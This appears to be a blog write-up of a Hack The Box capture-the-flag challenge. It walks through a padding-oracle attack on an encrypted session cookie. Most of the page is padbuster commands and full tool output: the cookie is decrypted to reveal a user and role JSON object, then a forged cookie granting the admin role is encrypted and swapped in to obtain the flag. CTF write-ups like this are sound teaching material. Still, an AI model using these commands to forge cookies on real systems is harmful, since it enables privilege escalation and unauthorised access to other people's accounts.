Pages

Oracle-Padding-Exploit

-------------------------------------------------------------------------------------------------------------------
STEP 1
padbuster http://docker.hackthebox.eu:37742 zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 256 302 0 profile.php
-------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------
STEP 2
padbuster http://docker.hackthebox.eu:37742/profile.php zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0

** Finished ***

[+] Decrypted value (ASCII): {"user":"bdmin","role":"user"}

[+] Decrypted value (HEX): 7B2275736572223A2262646D696E222C22726F6C65223A2275736572227D0202

[+] Decrypted value (Base64): eyJ1c2VyIjoiYmRtaW4iLCJyb2xlIjoidXNlciJ9AgI=
-----------------------------------------------------------------------------------------------------------------
STEP 3
padbuster http://docker.hackthebox.eu:37742/profile.php zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0 --plaintext "{\"user\":\"admin\",\"role\":\"admin\"}"

** Finished ***

[+] Encrypted value is: LDRCU61StZbYrdIXPROTGIprI45i7IsYMAovrw2IGp8AAAAAAAAAAA%3D%3D
------------------------------------------------------------------------------------------------------------------

STEP 4

We add the newly made encrypted value of "role=admin" to the cookies and we find the flag.

Before

After












========================================================================
Full manuscript
:~$ padbuster http://docker.hackthebox.eu:37742/profile.php zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 3846

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 4 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 3846 N/A
2 ** 255 500 2203 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (188/256) [Byte 8]
[+] Success: (230/256) [Byte 7]
[+] Success: (10/256) [Byte 6]
[+] Success: (3/256) [Byte 5]
[+] Success: (10/256) [Byte 4]
[+] Success: (224/256) [Byte 3]
[+] Success: (226/256) [Byte 2]
[+] Success: (67/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): 58c562c826efa7a0
[+] Intermediate Bytes (HEX): b51926f3f9f51845
[+] Plain Text: {"user":

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 4 ***

[+] Success: (115/256) [Byte 8]
[+] Success: (121/256) [Byte 7]
[+] Success: (126/256) [Byte 6]
[+] Success: (181/256) [Byte 5]
[+] Success: (96/256) [Byte 4]
[+] Success: (256/256) [Byte 3]
[+] Success: (96/256) [Byte 2]
[+] Success: (142/256) [Byte 1]

Block 2 Results:
[+] Cipher Text (HEX): 31a52fdbef978446
[+] Intermediate Bytes (HEX): 7aa706a54f81858c
[+] Plain Text: "bdmin",

*** Starting Block 3 of 4 ***

[+] Success: (155/256) [Byte 8]
[+] Success: (68/256) [Byte 7]
[+] Success: (74/256) [Byte 6]
[+] Success: (114/256) [Byte 5]
[+] Success: (78/256) [Byte 4]
[+] Success: (186/256) [Byte 3]
[+] Success: (48/256) [Byte 2]
[+] Success: (229/256) [Byte 1]

Block 3 Results:
[+] Cipher Text (HEX): 566e38a2cbe1617c
[+] Intermediate Bytes (HEX): 13d740b78ab5be64
[+] Plain Text: "role":"

*** Starting Block 4 of 4 ***

[+] Success: (129/256) [Byte 8]
[+] Success: (159/256) [Byte 7]
[+] Success: (97/256) [Byte 6]
[+] Success: (19/256) [Byte 5]
[+] Success: (43/256) [Byte 4]
[+] Success: (165/256) [Byte 3]
[+] Success: (230/256) [Byte 2]
[+] Success: (213/256) [Byte 1]

Block 4 Results:
[+] Cipher Text (HEX): 409071862aba0508
[+] Intermediate Bytes (HEX): 231d5dd0e99c637e
[+] Plain Text: user"}

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): {"user":"bdmin","role":"user"}

[+] Decrypted value (HEX): 7B2275736572223A2262646D696E222C22726F6C65223A2275736572227D0202

[+] Decrypted value (Base64): eyJ1c2VyIjoiYmRtaW4iLCJyb2xlIjoidXNlciJ9AgI=

No comments:

Post a Comment